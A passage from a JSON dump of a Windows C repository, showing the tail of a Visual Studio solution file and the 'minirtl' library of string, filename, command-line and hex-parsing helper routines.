\"{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Shigure\", \"Shigure\\Shigure.vcxproj\", \"{77AD1A3E-BA02-4376-976D-BA356F98F32F}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Harusame\", \"Harusame\\Harusame.vcxproj\", \"{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Yuudachi\", \"Yuudachi\\Yuudachi.vcxproj\", \"{14358883-8E74-44F5-BCC4-C32D41A3A662}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Murasame\", \"Murasame\\Murasame.vcxproj\", \"{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x64.Build.0 = Debug|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Debug|x86.Build.0 = Debug|Win32\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x64.ActiveCfg = Release|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x64.Build.0 = Release|x64\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x86.ActiveCfg = Release|Win32\n\t\t{06E37BF4-003C-43F6-B0D5-6B9DAE05D4F7}.Release|x86.Build.0 = Release|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x64.Build.0 = Debug|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Debug|x86.Build.0 = Debug|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x64.ActiveCfg = 
Release|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x64.Build.0 = Release|x64\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x86.ActiveCfg = Release|Win32\n\t\t{77AD1A3E-BA02-4376-976D-BA356F98F32F}.Release|x86.Build.0 = Release|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x64.Build.0 = Debug|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Debug|x86.Build.0 = Debug|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x64.ActiveCfg = Release|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x64.Build.0 = Release|x64\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x86.ActiveCfg = Release|Win32\n\t\t{169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}.Release|x86.Build.0 = Release|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x64.Build.0 = Debug|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Debug|x86.Build.0 = Debug|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x64.ActiveCfg = Release|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x64.Build.0 = Release|x64\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x86.ActiveCfg = Release|Win32\n\t\t{14358883-8E74-44F5-BCC4-C32D41A3A662}.Release|x86.Build.0 = Release|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x64.Build.0 = Debug|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Debug|x86.Build.0 = Debug|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x64.ActiveCfg = Release|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x64.Build.0 = 
Release|x64\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x86.ActiveCfg = Release|Win32\n\t\t{37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "Source/minirtl/_filename.c",
    "content": "#include <Windows.h>\n#include \"minirtl.h\"\n\nchar *_filename_a(const char *f)\n{\n\tchar *p = (char *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '\\\\')\n\t\t\tp = (char *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nwchar_t *_filename_w(const wchar_t *f)\n{\n\twchar_t *p = (wchar_t *)f;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'\\\\')\n\t\t\tp = (wchar_t *)f + 1;\n\t\tf++;\n\t}\n\treturn p;\n}\n\nchar *_fileext_a(const char *f)\n{\n\tchar *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (char)0) {\n\t\tif (*f == '.')\n\t\t\tp = (char *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (char *)f;\n\n\treturn p;\n}\n\nwchar_t *_fileext_w(const wchar_t *f)\n{\n\twchar_t *p = 0;\n\n\tif (f == 0)\n\t\treturn 0;\n\n\twhile (*f != (wchar_t)0) {\n\t\tif (*f == (wchar_t)'.')\n\t\t\tp = (wchar_t *)f;\n\t\tf++;\n\t}\n\n\tif (p == 0)\n\t\tp = (wchar_t *)f;\n\n\treturn p;\n}\n\nchar *_filename_noext_a(char *dest, const char *f)\n{\n    char *p, *l, *dot;\n\n    if ((f == 0) || (dest == 0))\n        return 0;\n\n    p = _filename_a(f);\n    if (p == 0)\n        return 0;\n\n    dot = _strend_a(p);\n    if (dot == 0)\n        return 0;\n\n    l = p;\n\n    while (*l != (char)0)\n    {\n        if (*l == '.')\n            dot = l;\n        l++;\n    }\n\n    while (p<dot)\n    {\n        *dest = *p;\n        p++;\n        dest++;\n    }\n\n    *dest = 0;\n    return dest;\n}\n\nwchar_t *_filename_noext_w(wchar_t *dest, const wchar_t *f)\n{\n    wchar_t *p, *l, *dot;\n\n    if ((f == 0) || (dest == 0))\n        return 0;\n\n    p = _filename_w(f);\n    if (p == 0)\n        return 0;\n\n    dot = _strend_w(p);\n    if (dot == 0)\n        return 0;\n\n    l = p;\n\n    while (*l != (wchar_t)0)\n    {\n        if (*l == (wchar_t)'.')\n            dot = l;\n        l++;\n    }\n\n    while (p<dot)\n    {\n        *dest = *p;\n        p++;\n        dest++;\n    }\n\n    *dest = 0;\n    
return dest;\n}\n\nchar *_filepath_a(const char *fname, char *fpath)\n{\n    char *p = (char *)fname, *p0 = (char*)fname, *p1 = (char*)fpath;\n\n\tif ((fname == 0) || (fpath == NULL)) \n\t\treturn 0;\n\n\twhile (*fname != (char)0) {\n\t\tif (*fname == '\\\\')\n\t\t\tp = (char *)fname + 1;\n\t\tfname++;\n\t}\n\n    while (p0 < p) {\n        *p1 = *p0;\n        p1++;\n        p0++;\n    }\n    *p1 = 0;\n\n\treturn fpath;\n}\n\nwchar_t *_filepath_w(const wchar_t *fname, wchar_t *fpath)\n{\n    wchar_t *p = (wchar_t *)fname, *p0 = (wchar_t*)fname, *p1 = (wchar_t*)fpath;\n\n    if ((fname == 0) || (fpath == NULL))\n        return 0;\n\n    while (*fname != (wchar_t)0) {\n        if (*fname == '\\\\')\n            p = (wchar_t *)fname + 1;\n        fname++;\n    }\n\n    while (p0 < p) {\n        *p1 = *p0;\n        p1++;\n        p0++;\n    }\n    *p1 = 0;\n\n    return fpath;\n}\n"
  },
  {
    "path": "Source/minirtl/_filename.h",
    "content": "#pragma once\n\n#ifndef _FILENAMEH_\n#define _FILENAMEH_\n\nchar *_filename_a(const char *f);\nwchar_t *_filename_w(const wchar_t *f);\nchar *_fileext_a(const char *f);\nwchar_t *_fileext_w(const wchar_t *f);\nchar *_filename_noext_a(char *dest, const char *f);\nwchar_t *_filename_noext_w(wchar_t *dest, const wchar_t *f);\nchar *_filepath_a(const char *fname, char *fpath);\nwchar_t *_filepath_w(const wchar_t *fname, wchar_t *fpath);\n\n#ifdef UNICODE\n#define _filename  _filename_w\n#define _fileext   _fileext_w\n#define _filepath  _filepath_w\n#define _filename_noext  _filename_noext_w\n#else // ANSI\n#define _filename  _filename_a\n#define _fileext   _fileext_a\n#define _filepath  _filepath_a\n#define _filename_noext  _filename_noext_a\n#endif\n\n#endif /* _FILENAMEH_ */"
  },
  {
    "path": "Source/minirtl/_strcat.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strcat_a(char *dest, const char *src)\n{\n\tif ( (dest==0) || (src==0) )\n\t\treturn dest;\n\n\twhile ( *dest!=0 )\n\t\tdest++;\n\n\twhile ( *src!=0 ) {\n\t\t*dest = *src;\n\t\tdest++;\n\t\tsrc++;\n\t} \n\n\t*dest = 0;\n\treturn dest;\n}\n\nwchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)\n{\n\tif ( (dest==0) || (src==0) )\n\t\treturn dest;\n\n\twhile ( *dest!=0 )\n\t\tdest++;\n\n\twhile ( *src!=0 ) {\n\t\t*dest = *src;\n\t\tdest++;\n\t\tsrc++;\n\t} \n\n\t*dest = 0;\n\treturn dest;\n}\n"
  },
  {
    "path": "Source/minirtl/_strcmp.c",
    "content": "#include \"rtltypes.h\"\n\nint _strcmp_a(const char *s1, const char *s2)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strcmp_w(const wchar_t *s1, const wchar_t *s2)\n{\n\twchar_t\tc1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/minirtl/_strcmpi.c",
    "content": "#include \"rtltypes.h\"\n\nint _strcmpi_a(const char *s1, const char *s2)\n{\n\tchar c1, c2;\n\t\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = locase_a(*s1);\n\t\tc2 = locase_a(*s2);\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strcmpi_w(const wchar_t *s1, const wchar_t *s2)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tdo {\n\t\tc1 = locase_w(*s1);\n\t\tc2 = locase_w(*s2);\n\t\ts1++;\n\t\ts2++;\n\t} while ( (c1 != 0) && (c1 == c2) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/minirtl/_strcpy.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strcpy_a(char *dest, const char *src)\n{\n\tchar *p;\n\n\tif ( (dest==0) || (src==0) )\n\t\treturn dest;\n\n\tif (dest == src)\n\t\treturn dest;\n\n\tp = dest;\n\twhile ( *src!=0 ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t} \n\n\t*p = 0;\n\treturn dest;\n}\n\nwchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)\n{\n\twchar_t *p;\n\n\tif ((dest == 0) || (src == 0))\n\t\treturn dest;\n\n\tif (dest == src)\n\t\treturn dest;\n\n\tp = dest;\n\twhile ( *src!=0 ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t} \n\n\t*p = 0;\n\treturn dest;\n}\n"
  },
  {
    "path": "Source/minirtl/_strend.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strend_a(const char *s)\n{\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (char *)s;\n}\n\nwchar_t *_strend_w(const wchar_t *s)\n{\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (wchar_t *)s;\n}\n"
  },
  {
    "path": "Source/minirtl/_strlen.c",
    "content": "#include \"rtltypes.h\"\n\nsize_t _strlen_a(const char *s)\n{\n\tchar *s0 = (char *)s;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (s-s0);\n}\n\nsize_t _strlen_w(const wchar_t *s)\n{\n\twchar_t *s0 = (wchar_t *)s;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 )\n\t\ts++;\n\n\treturn (s-s0);\n}\n"
  },
  {
    "path": "Source/minirtl/_strncmp.c",
    "content": "#include \"rtltypes.h\"\n\nint _strncmp_a(const char *s1, const char *s2, size_t cchars)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = *s1;\n\t\tc2 = *s2;\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/minirtl/_strncmpi.c",
    "content": "#include \"rtltypes.h\"\n\nint _strncmpi_a(const char *s1, const char *s2, size_t cchars)\n{\n\tchar c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_a(*s1);\n\t\tc2 = locase_a(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n\nint _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)\n{\n\twchar_t c1, c2;\n\n\tif ( s1==s2 )\n\t\treturn 0;\n\n\tif ( s1==0 )\n\t\treturn -1;\n\n\tif ( s2==0 )\n\t\treturn 1;\n\n\tif ( cchars==0 )\n\t\treturn 0;\n\n\tdo {\n\t\tc1 = locase_w(*s1);\n\t\tc2 = locase_w(*s2);\n\t\ts1++;\n\t\ts2++;\n\t\tcchars--;\n\t} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );\n\t\n\treturn (int)(c1 - c2);\n}\n"
  },
  {
    "path": "Source/minirtl/_strncpy.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)\n{\n\tchar *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n\nwchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)\n{\n\twchar_t *p;\n\n\tif ( (dest==0) || (src==0) || (ccdest==0) )\n\t\treturn dest;\n\n\tccdest--;\n\tp = dest;\n\n\twhile ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {\n\t\t*p = *src;\n\t\tp++;\n\t\tsrc++;\n\t\tccdest--;\n\t\tccsrc--;\n\t}\n\n\t*p = 0;\n\treturn dest;\n}\n"
  },
  {
    "path": "Source/minirtl/_strstr.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strstr_a(const char *s, const char *sub_s)\n{\n\tchar c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (char *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = *sub_s;\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = *s;\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (char *)s;\n\t\ttmpsub = (char *)sub_s;\n\t\tdo {\n\t\t\tc1 = *tmps;\n\t\t\tc2 = *tmpsub;\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (char *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n\nwchar_t *_strstr_w(const wchar_t *s, const wchar_t *sub_s)\n{\n\twchar_t c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (wchar_t *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = *sub_s;\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = *s;\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (wchar_t *)s;\n\t\ttmpsub = (wchar_t *)sub_s;\n\t\tdo {\n\t\t\tc1 = *tmps;\n\t\t\tc2 = *tmpsub;\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (wchar_t *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n"
  },
  {
    "path": "Source/minirtl/_strstri.c",
    "content": "#include \"rtltypes.h\"\n\nchar *_strstri_a(const char *s, const char *sub_s)\n{\n\tchar c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (char *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_a(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_a(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (char *)s;\n\t\ttmpsub = (char *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_a(*tmps);\n\t\t\tc2 = locase_a(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (char *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n\nwchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s)\n{\n\twchar_t c0, c1, c2, *tmps, *tmpsub;\n\n\tif (s == sub_s)\n\t\treturn (wchar_t *)s;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\tif (sub_s == 0)\n\t\treturn 0;\n\n\tc0 = locase_w(*sub_s);\n\twhile (c0 != 0) {\n\n\t\twhile (*s != 0) {\n\t\t\tc2 = locase_w(*s);\n\t\t\tif (c2 == c0)\n\t\t\t\tbreak;\n\t\t\ts++;\n\t\t}\n\n\t\tif (*s == 0)\n\t\t\treturn 0;\n\n\t\ttmps = (wchar_t *)s;\n\t\ttmpsub = (wchar_t *)sub_s;\n\t\tdo {\n\t\t\tc1 = locase_w(*tmps);\n\t\t\tc2 = locase_w(*tmpsub);\n\t\t\ttmps++;\n\t\t\ttmpsub++;\n\t\t} while ((c1 == c2) && (c2 != 0));\n\n\t\tif (c2 == 0)\n\t\t\treturn (wchar_t *)s;\n\n\t\ts++;\n\t}\n\treturn 0;\n}\n"
  },
  {
    "path": "Source/minirtl/cmdline.c",
    "content": "#include <windows.h>\n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tTCHAR\tdivider;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tif (CmdLine == NULL) {\n\t\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t\t*Buffer = 0;\n\t\treturn FALSE;\n\t}\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) {\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t)\n{\n\tULONG\tc, plen = 0;\n\tTCHAR\tdivider;\n\n\tif (CmdLine == NULL)\n\t\treturn FALSE;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = 0;\n\n\tfor (c = 0; c <= ParamIndex; c++) {\n\t\tplen = 0;\n\n\t\twhile (*CmdLine == ' ')\n\t\t\tCmdLine++;\n\n\t\tswitch (*CmdLine) {\n\t\tcase 0:\n\t\t\tgoto zero_term_exit;\n\n\t\tcase '\"':\n\t\t\tCmdLine++;\n\t\t\tdivider = '\"';\n\t\t\tbreak;\n\n\t\tdefault:\n\t\t\tdivider = ' ';\n\t\t}\n\n\t\twhile ((*CmdLine != '\"') && (*CmdLine != divider) && (*CmdLine != 0)) {\n\t\t\tplen++;\n\t\t\tif (c == ParamIndex)\n\t\t\t\tif ((plen < BufferSize) && (Buffer != NULL)) 
{\n\t\t\t\t\t*Buffer = *CmdLine;\n\t\t\t\t\tBuffer++;\n\t\t\t\t}\n\t\t\tCmdLine++;\n\t\t}\n\n\t\tif (*CmdLine != 0)\n\t\t\tCmdLine++;\n\t}\n\nzero_term_exit:\n\n\tif ((Buffer != NULL) && (BufferSize > 0))\n\t\t*Buffer = 0;\n\n\tif (ParamLen != NULL)\n\t\t*ParamLen = plen;\n\n\tif (plen < BufferSize)\n\t\treturn TRUE;\n\telse\n\t\treturn FALSE;\n}\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath)\n{\n\tchar *p = (char *)FileName, *p0 = (char *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (char *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)\n{\n\twchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;\n\n\tif ((FileName == 0) || (FilePath == 0))\n\t\treturn 0;\n\n\twhile (*FileName != 0) {\n\t\tif (*FileName == '\\\\')\n\t\t\tp = (wchar_t *)FileName + 1;\n\t\tFileName++;\n\t}\n\n\twhile (p0 < p) {\n\t\t*FilePath = *p0;\n\t\tFilePath++;\n\t\tp0++;\n\t}\n\n\t*FilePath = 0;\n\n\treturn FilePath;\n}\n"
  },
  {
    "path": "Source/minirtl/cmdline.h",
    "content": "#ifndef _CMDLINEH_\n#define _CMDLINEH_\n\nBOOL GetCommandLineParamW(\n\tIN\tLPCWSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPWSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nBOOL GetCommandLineParamA(\n\tIN\tLPCSTR\tCmdLine,\n\tIN\tULONG\tParamIndex,\n\tOUT\tLPSTR\tBuffer,\n\tIN\tULONG\tBufferSize,\n\tOUT\tPULONG\tParamLen\n\t);\n\nchar *ExtractFilePathA(const char *FileName, char *FilePath);\nwchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);\n\n#ifdef UNICODE\n\n#define ExtractFilePath\t\t\tExtractFilePathW\n#define GetCommandLineParam\t\tGetCommandLineParamW\n\n#else // ANSI\n\n#define ExtractFilePath\t\t\tExtractFilePathA\n#define GetCommandLineParam\t\tGetCommandLineParamA\n\n#endif\n\n#endif /* _CMDLINEH_ */\n"
  },
  {
    "path": "Source/minirtl/hextou64.c",
    "content": "#include \"rtltypes.h\"\n\nunsigned long long hextou64_a(char *s)\n{\n\tunsigned long long\tr = 0;\n\tchar\t\t\tc;\n\n\tif (s == 0)\n\t\treturn 0;\n\n\twhile (*s != 0) {\n\t\tc = locase_a(*s);\n\t\ts++;\n\t\tif (_isdigit_a(c))\n\t\t\tr = 16 * r + (c - '0');\n\t\telse\n\t\t\tif ((c >= 'a') && (c <= 'f'))\n\t\t\t\tr = 16 * r + (c - 'a' + 10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n\nunsigned long long hextou64_w(wchar_t *s)\n{\n\tunsigned long long\tr = 0;\n\twchar_t\t\t\tc;\n\n\tif ( s==0 )\n\t\treturn 0;\n\n\twhile ( *s!=0 ) {\n\t\tc = locase_w(*s);\n\t\ts++;\n\t\tif (_isdigit_w(c))\n\t\t\tr = 16*r + (c-L'0');\n\t\telse\n\t\t\tif ((c >= L'a') && (c <= L'f'))\n\t\t\t\tr = 16*r + (c-L'a'+10);\n\t\t\telse\n\t\t\t\tbreak;\n\t}\n\treturn r;\n}\n"
  },
  {
    "path": "Source/minirtl/hextoul.c",
